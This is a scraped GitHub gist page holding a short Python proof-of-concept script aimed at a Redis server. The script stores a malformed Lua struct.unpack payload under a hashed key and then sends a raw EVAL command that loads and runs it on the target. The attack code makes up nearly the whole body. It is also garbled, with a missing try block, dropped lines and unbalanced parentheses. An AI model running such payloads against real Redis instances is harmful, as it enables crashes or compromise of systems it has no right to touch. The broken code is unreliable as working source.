Skip to content

Instantly share code, notes, and snippets.

Created June 13, 2018 16:43
  • Star 4 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
Star You must be signed in to star a gist
Save antirez/bca0ad7a9c60c72e9600c7f720e9d035 to your computer and use it in GitHub Desktop.
import socket
import hashlib
#3rd party
import redis #pip install
server = ''
port = 6379
def send_to_redis(server, port, data, timeout=2):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((server, port))
except socket.timeout:
print 'Unable to connect to target ; returning'
return None
def main():
payload = 'return struct.unpack(\'bc0\', \'\xff\')'
h = hashlib.sha1()
key = h.hexdigest()
#submit this payload to the server (it's binary, so tough to pass in on cli)
r = redis.StrictRedis(host=server, port=port)
r.set(key, payload)
#reflect the payload back to redis and load it up as code
payload = 'eval "return loadstring(\'get\', KEYS[1]))()" 1 %s\n' % key
send_to_redis(server, port, payload)
if __name__ == '__main__':
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment